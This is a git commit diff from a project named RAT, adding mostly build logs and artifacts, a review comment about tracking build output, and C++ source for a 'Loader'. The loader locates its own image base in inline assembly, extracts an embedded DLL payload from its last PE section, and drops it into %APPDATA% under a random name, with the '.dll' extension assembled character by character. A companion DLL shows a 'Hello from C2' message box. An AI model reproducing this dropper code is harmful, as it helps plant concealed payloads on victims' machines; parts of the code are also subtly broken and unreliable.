diff --git a/Debug/FunDLL.exp b/Debug/FunDLL.exp
new file mode 100644
index 0000000..365888f
Binary files /dev/null and b/Debug/FunDLL.exp differ
diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
new file mode 100644
index 0000000..2be397b
Binary files /dev/null and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
new file mode 100644
index 0000000..e9521e9
Binary files /dev/null and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
new file mode 100644
index 0000000..5cc9330
Binary files /dev/null and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
new file mode 100644
index 0000000..3afe78f
Binary files /dev/null and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
new file mode 100644
index 0000000..7442067
Binary files /dev/null and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.Build.CppClean.log b/Dll/Debug/Dll.Build.CppClean.log
new file mode 100644
index 0000000..d6d1236
--- /dev/null
+++ b/Dll/Debug/Dll.Build.CppClean.log
@@ -0,0 +1,13 @@
+c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
+c:\users\hellisabove\source\repos\rat\debug\dll.lib
+c:\users\hellisabove\source\repos\rat\debug\dll.exp
+c:\users\hellisabove\source\repos\rat\debug\dll.dll
+c:\users\hellisabove\source\repos\rat\debug\dll.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
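Review bot: Build output should not be tracked, yet this hunk and the rest of the commit add Dll/Debug/*.log and *.tlog files, Debug/*.pdb, .iobj/.ipdb and .ilk artifacts to the repository. They are regenerated on every build, every line here carries an absolute path that exposes the developer's local account name, and the MSB8028 warning recorded in Dll/Debug/Dll.log already shows the shared Debug\ intermediate directory confusing clean and rebuild. Add `Debug/`, `x64/` and `*.vcxproj.user` to a .gitignore and drop the tracked copies with `git rm -r --cached`.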
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
new file mode 100644
index 0000000..a7d3ee7
--- /dev/null
+++ b/Dll/Debug/Dll.log
@@ -0,0 +1,7 @@
+C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
+C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
+ Generating code
+ All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ Finished generating code
+ Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
diff --git a/Dll/Debug/Dll.tlog/CL.command.1.tlog b/Dll/Debug/Dll.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..4fe39f0
Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/Dll.tlog/CL.read.1.tlog b/Dll/Debug/Dll.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..8d47c28
Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/Dll.tlog/CL.write.1.tlog b/Dll/Debug/Dll.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..27f4603
Binary files /dev/null and b/Dll/Debug/Dll.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/Dll.tlog/Dll.lastbuildstate b/Dll/Debug/Dll.tlog/Dll.lastbuildstate
new file mode 100644
index 0000000..23245b8
--- /dev/null
+++ b/Dll/Debug/Dll.tlog/Dll.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
+Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
diff --git a/Dll/Debug/Dll.tlog/Dll.write.1u.tlog b/Dll/Debug/Dll.tlog/Dll.write.1u.tlog
new file mode 100644
index 0000000..7e00ff0
Binary files /dev/null and b/Dll/Debug/Dll.tlog/Dll.write.1u.tlog differ
diff --git a/Dll/Debug/Dll.tlog/link.command.1.tlog b/Dll/Debug/Dll.tlog/link.command.1.tlog
new file mode 100644
index 0000000..75aba57
Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.command.1.tlog differ
diff --git a/Dll/Debug/Dll.tlog/link.read.1.tlog b/Dll/Debug/Dll.tlog/link.read.1.tlog
new file mode 100644
index 0000000..d81d459
Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.read.1.tlog differ
diff --git a/Dll/Debug/Dll.tlog/link.write.1.tlog b/Dll/Debug/Dll.tlog/link.write.1.tlog
new file mode 100644
index 0000000..e3312ec
Binary files /dev/null and b/Dll/Debug/Dll.tlog/link.write.1.tlog differ
diff --git a/Injector/x64/Debug/Injector.vcxproj.FileListAbsolute.txt b/Dll/Debug/Dll.vcxproj.FileListAbsolute.txt
similarity index 100%
rename from Injector/x64/Debug/Injector.vcxproj.FileListAbsolute.txt
rename to Dll/Debug/Dll.vcxproj.FileListAbsolute.txt
diff --git a/Dll/Debug/FunDLL.Build.CppClean.log b/Dll/Debug/FunDLL.Build.CppClean.log
new file mode 100644
index 0000000..a1a62d7
--- /dev/null
+++ b/Dll/Debug/FunDLL.Build.CppClean.log
@@ -0,0 +1,15 @@
+c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
+c:\users\hellisabove\source\repos\rat\debug\fundll.lib
+c:\users\hellisabove\source\repos\rat\debug\fundll.exp
+c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
+c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
+c:\users\hellisabove\source\repos\rat\debug\fundll.dll
+c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
+c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..b1f5512
Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..8d47c28
Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..27f4603
Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate b/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate
new file mode 100644
index 0000000..23245b8
--- /dev/null
+++ b/Dll/Debug/FunDLL.tlog/FunDLL.lastbuildstate
@@ -0,0 +1,2 @@ +#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 +Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog new file mode 100644 index 0000000..cecb9a2 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog new file mode 100644 index 0000000..ea9fd82 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog new file mode 100644 index 0000000..d66d11c Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog new file mode 100644 index 0000000..1b566d3 Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb new file mode 100644 index 0000000..c1fb6af Binary files /dev/null and b/Dll/Debug/vc141.pdb differ diff --git a/FunDLL/FunDLL.vcxproj b/Dll/Dll.vcxproj similarity index 88% rename from FunDLL/FunDLL.vcxproj rename to Dll/Dll.vcxproj index e8535df..8574aaf 100644 --- a/FunDLL/FunDLL.vcxproj +++ b/Dll/Dll.vcxproj @@ -21,17 +21,18 @@ 16.0 Win32Proj - {c7e129b4-8a7e-4e5c-a259-573609675fed} - RAT + {0299d361-d3f7-419a-ab93-fb36642c97fa} + Dll 7.0 FunDLL - Application + DynamicLibrary true - v143 + v141_xp Unicode + true Application @@ -41,18 +42,17 @@ Unicode - DynamicLibrary + Application true - v141_xp - MultiByte - true + v143 + Unicode - DynamicLibrary + Application false - v141_xp + v143 true - MultiByte + Unicode 
@@ -72,18 +72,25 @@ - + false Level3 - true - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true + false + WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + false + MaxSpeed + true + Default + MultiThreaded + true + ProgramDatabase + true - Console + Windows true @@ -106,21 +113,13 @@ Level3 - false - WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false - MaxSpeed - true - false - Default - MultiThreaded - true - ProgramDatabase + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true - Windows + Console true - 5.01 @@ -128,16 +127,15 @@ Level3 true true - false - WIN32;NDEBUG;_WINDOWS;_USRDLL;RAT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true - Windows + Console true true true - 5.02 diff --git a/FunDLL/FunDLL.vcxproj.filters b/Dll/Dll.vcxproj.filters similarity index 100% rename from FunDLL/FunDLL.vcxproj.filters rename to Dll/Dll.vcxproj.filters diff --git a/FunDLL/FunDLL.vcxproj.user b/Dll/Dll.vcxproj.user similarity index 100% rename from FunDLL/FunDLL.vcxproj.user rename to Dll/Dll.vcxproj.user diff --git a/FunDLL/fundll.cpp b/Dll/fundll.cpp similarity index 79% rename from FunDLL/fundll.cpp rename to Dll/fundll.cpp index 640de68..5882e98 100644 --- a/FunDLL/fundll.cpp +++ b/Dll/fundll.cpp @@ -9,12 +9,11 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) { break; default: - + break; } - return 1; } extern "C" __declspec(dllexport) int FunEntry() { - return MessageBoxA(0, "Hello World From C2", 0, 0); + return MessageBoxA(0, "Hello from C2", 0, 0); } \ No newline at end of file diff --git a/Injector/Debug/Injector.Build.CppClean.log b/Injector/Debug/Injector.Build.CppClean.log new file mode 100644 index 0000000..64be309 --- /dev/null +++ b/Injector/Debug/Injector.Build.CppClean.log 
@@ -0,0 +1,13 @@
+c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb
+c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk
+c:\users\hellisabove\source\repos\rat\debug\injector.exe
+c:\users\hellisabove\source\repos\rat\debug\injector.pdb
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog
+c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog
diff --git a/Injector/Debug/Injector.exe.recipe b/Injector/Debug/Injector.exe.recipe
new file mode 100644
index 0000000..f052071
--- /dev/null
+++ b/Injector/Debug/Injector.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
new file mode 100644
index 0000000..b2ac90c
Binary files /dev/null and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log
new file mode 100644
index 0000000..198e2b0
--- /dev/null
+++ b/Injector/Debug/Injector.log
@@ -0,0 +1,2 @@
+ LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
+ Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
diff --git a/Injector/Debug/Injector.tlog/CL.command.1.tlog b/Injector/Debug/Injector.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..ec99c38
Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.command.1.tlog differ
diff --git a/Injector/Debug/Injector.tlog/CL.read.1.tlog b/Injector/Debug/Injector.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..0c81f4c
Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.read.1.tlog differ
diff --git a/Injector/Debug/Injector.tlog/CL.write.1.tlog b/Injector/Debug/Injector.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..7873a02
Binary files /dev/null and b/Injector/Debug/Injector.tlog/CL.write.1.tlog differ
diff --git a/Injector/Debug/Injector.tlog/Cl.items.tlog b/Injector/Debug/Injector.tlog/Cl.items.tlog
new file mode 100644
index 0000000..31c4d28
--- /dev/null
+++ b/Injector/Debug/Injector.tlog/Cl.items.tlog
@@ -0,0 +1 @@
+C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj
diff --git a/Injector/Debug/Injector.tlog/Injector.lastbuildstate b/Injector/Debug/Injector.tlog/Injector.lastbuildstate
new file mode 100644
index 0000000..4253841
--- /dev/null
+++ b/Injector/Debug/Injector.tlog/Injector.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
+Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
diff --git a/Injector/Debug/Injector.tlog/link.command.1.tlog b/Injector/Debug/Injector.tlog/link.command.1.tlog
new file mode 100644
index 0000000..09060de
Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.command.1.tlog differ
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
new file mode 100644
index 0000000..4a6fd2d
Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/Injector.tlog/link.write.1.tlog b/Injector/Debug/Injector.tlog/link.write.1.tlog new file mode 100644 index 0000000..60df88e Binary files /dev/null and b/Injector/Debug/Injector.tlog/link.write.1.tlog differ diff --git a/Injector/Debug/Injector.vcxproj.FileListAbsolute.txt b/Injector/Debug/Injector.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb new file mode 100644 index 0000000..a02dcd8 Binary files /dev/null and b/Injector/Debug/vc143.idb differ diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb new file mode 100644 index 0000000..bc03652 Binary files /dev/null and b/Injector/Debug/vc143.pdb differ diff --git a/Injector/Injector.vcxproj b/Injector/Injector.vcxproj index be9bf59..fce0f03 100644 --- a/Injector/Injector.vcxproj +++ b/Injector/Injector.vcxproj @@ -35,9 +35,9 @@ Application false - v143 + v141 true - Unicode + MultiByte Application @@ -127,7 +127,7 @@ - + diff --git a/Injector/Injector.vcxproj.filters b/Injector/Injector.vcxproj.filters index 3e7e62e..9ce493a 100644 --- a/Injector/Injector.vcxproj.filters +++ b/Injector/Injector.vcxproj.filters @@ -15,7 +15,7 @@ - + Source Files diff --git a/Injector/Source.cpp b/Injector/injector.cpp similarity index 100% rename from Injector/Source.cpp rename to Injector/injector.cpp diff --git a/Injector/x64/Debug/Injector.Build.CppClean.log b/Injector/x64/Debug/Injector.Build.CppClean.log deleted file mode 100644 index 0ecb3c6..0000000 --- a/Injector/x64/Debug/Injector.Build.CppClean.log +++ /dev/null 
@@ -1,12 +0,0 @@
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.pdb
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.idb
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\source.obj
-c:\users\hellisabove\source\repos\rat\x64\debug\injector.ilk
-c:\users\hellisabove\source\repos\rat\x64\debug\injector.exe
-c:\users\hellisabove\source\repos\rat\x64\debug\injector.pdb
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.command.1.tlog
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.read.1.tlog
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.write.1.tlog
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.command.1.tlog
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.read.1.tlog
-c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.write.1.tlog
diff --git a/Injector/x64/Debug/Injector.log b/Injector/x64/Debug/Injector.log
deleted file mode 100644
index f142a7f..0000000
--- a/Injector/x64/Debug/Injector.log
+++ /dev/null
@@ -1,2 +0,0 @@
- Source.cpp
- Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\x64\Debug\Injector.exe
diff --git a/Loader/Debug/Loader.Build.CppClean.log b/Loader/Debug/Loader.Build.CppClean.log
new file mode 100644
index 0000000..159bfc9
--- /dev/null
+++ b/Loader/Debug/Loader.Build.CppClean.log
@@ -0,0 +1,11 @@
+c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb
+c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj
+c:\users\hellisabove\source\repos\rat\debug\loader.exe
+c:\users\hellisabove\source\repos\rat\debug\loader.pdb
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog
+c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog
diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log
new file mode 100644
index 0000000..edac3ef
--- /dev/null
+++ b/Loader/Debug/Loader.log
@@ -0,0 +1,2 @@
+C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
+ Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
diff --git a/Loader/Debug/Loader.tlog/CL.command.1.tlog b/Loader/Debug/Loader.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..ad07b3b
Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.command.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/CL.read.1.tlog b/Loader/Debug/Loader.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..51bc714
Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.read.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/CL.write.1.tlog b/Loader/Debug/Loader.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..484979f
Binary files /dev/null and b/Loader/Debug/Loader.tlog/CL.write.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/Loader.lastbuildstate b/Loader/Debug/Loader.tlog/Loader.lastbuildstate
new file mode 100644
index 0000000..23245b8
--- /dev/null
+++ b/Loader/Debug/Loader.tlog/Loader.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
+Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog
new file mode 100644
index 0000000..1aeeb1c
Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
new file mode 100644
index 0000000..62b1f8e
Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/link.write.1.tlog b/Loader/Debug/Loader.tlog/link.write.1.tlog
new file mode 100644
index 0000000..e0d3597
Binary files /dev/null and b/Loader/Debug/Loader.tlog/link.write.1.tlog differ
diff --git a/Loader/Debug/Loader.vcxproj.FileListAbsolute.txt b/Loader/Debug/Loader.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
new file mode 100644
index 0000000..8f184aa
Binary files /dev/null and b/Loader/Debug/vc141.pdb differ
diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj
new file mode 100644
index 0000000..0e0d345
--- /dev/null
+++ b/Loader/Loader.vcxproj
@@ -0,0 +1,165 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {81f05638-72b8-41da-b80a-4f292961d9a1} + Loader + 10.0 + + + + Application + true + v141_xp + Unicode + + + Application + false + v141_xp + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v141_xp + true + Unicode + + + + + + + + + + + + + + + + + + + + + false + + + false + + + false + + + + TurnOffAllWarnings + false + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + false + ProgramDatabase + MaxSpeed + true + true + Default + MultiThreaded + false + + + Windows + true + kernel32.lib;user32.lib + + + + + TurnOffAllWarnings + false + true + true + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + true + MultiThreaded + false + + + Windows + true + true + true + + + kernel32.lib;user32.lib + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + TurnOffAllWarnings + false + true + false + WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + true + MultiThreaded + false + + + Windows + true + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/Loader/Loader.vcxproj.filters b/Loader/Loader.vcxproj.filters new file mode 100644 index 0000000..dfe9fcf --- /dev/null +++ b/Loader/Loader.vcxproj.filters @@ -0,0 +1,30 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/Loader/Loader.vcxproj.user b/Loader/Loader.vcxproj.user new file mode 100644 index 0000000..88a5509 
--- /dev/null
+++ b/Loader/Loader.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/Loader/loader.cpp b/Loader/loader.cpp
new file mode 100644
index 0000000..35af249
--- /dev/null
+++ b/Loader/loader.cpp
@@ -0,0 +1,23 @@
+#include
+#include "tools.h"
+
+INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
+ PBYTE module_base = PBYTE(Tools::GetImageBase());
+ if (module_base != ERROR) {
+ // extract payload from section move to %appdata% with random name
+ DWORD module_size = NULL;
+ PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
+
+ // move payload onto %appdata% with some random generated name
+ DWORD bytes_written = NULL;
+ WCHAR appdata_path[MAX_PATH];
+
+ if (ExpandEnvironmentStringsW(TEXT("%APPDATA%"), appdata_path, MAX_PATH - 1) > 0) {
+ wsprintfW(appdata_path, TEXT("%s\\%lu.%cl%c"), appdata_path, GetTickCount(), 'd', 'l');
+ HANDLE new_file = CreateFileW(appdata_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+ if (new_file != INVALID_HANDLE_VALUE) {
+ WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Loader/tools.cpp b/Loader/tools.cpp
new file mode 100644
index 0000000..ceadd41
--- /dev/null
+++ b/Loader/tools.cpp
@@ -0,0 +1,36 @@
+#include "tools.h"
+#include
+
+PVOID Tools::GetImageBase() {
+ PWORD virtual_address = PWORD(&GetImageBase);
+ PDWORD image_base = NULL;
+
+ __asm {
+ mov eax, virtual_address
+ and eax, 0xFFFF0000
+ IterateImage:
+ cmp WORD PTR[eax], 0x5A4D
+ je EndIteration
+ sub eax, 0x00010000
+ jmp IterateImage
+ EndIteration:
+ mov[image_base], eax
+ }
+
+ return image_base;
+}
+
+PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) {
+ PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base);
+ if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
+ PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew);
+ if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) {
+ PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers));
+ PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1);
+ if (dll_section != ERROR) {
+ *module_size = dll_section->Misc.VirtualSize;
+ return RtlOffsetToPointer(module_base, dll_section->VirtualAddress);
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Loader/tools.h b/Loader/tools.h
new file mode 100644
index 0000000..f9459ac
--- /dev/null
+++ b/Loader/tools.h
@@ -0,0 +1,9 @@
+#pragma once
+#include
+
+#define RtlOffsetToPointer(Module, Pointer) PBYTE(PBYTE(Module) + DWORD(Pointer))
+
+namespace Tools {
+ PVOID GetImageBase();
+ PBYTE ExtractDllFile(PBYTE module_base, PDWORD module_size);
+}
diff --git a/RAT.sln b/RAT.sln
index 6847389..a2f7dca 100644
--- a/RAT.sln
+++ b/RAT.sln
@@ -5,7 +5,9 @@ VisualStudioVersion = 17.6.33815.320
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}"
 EndProject
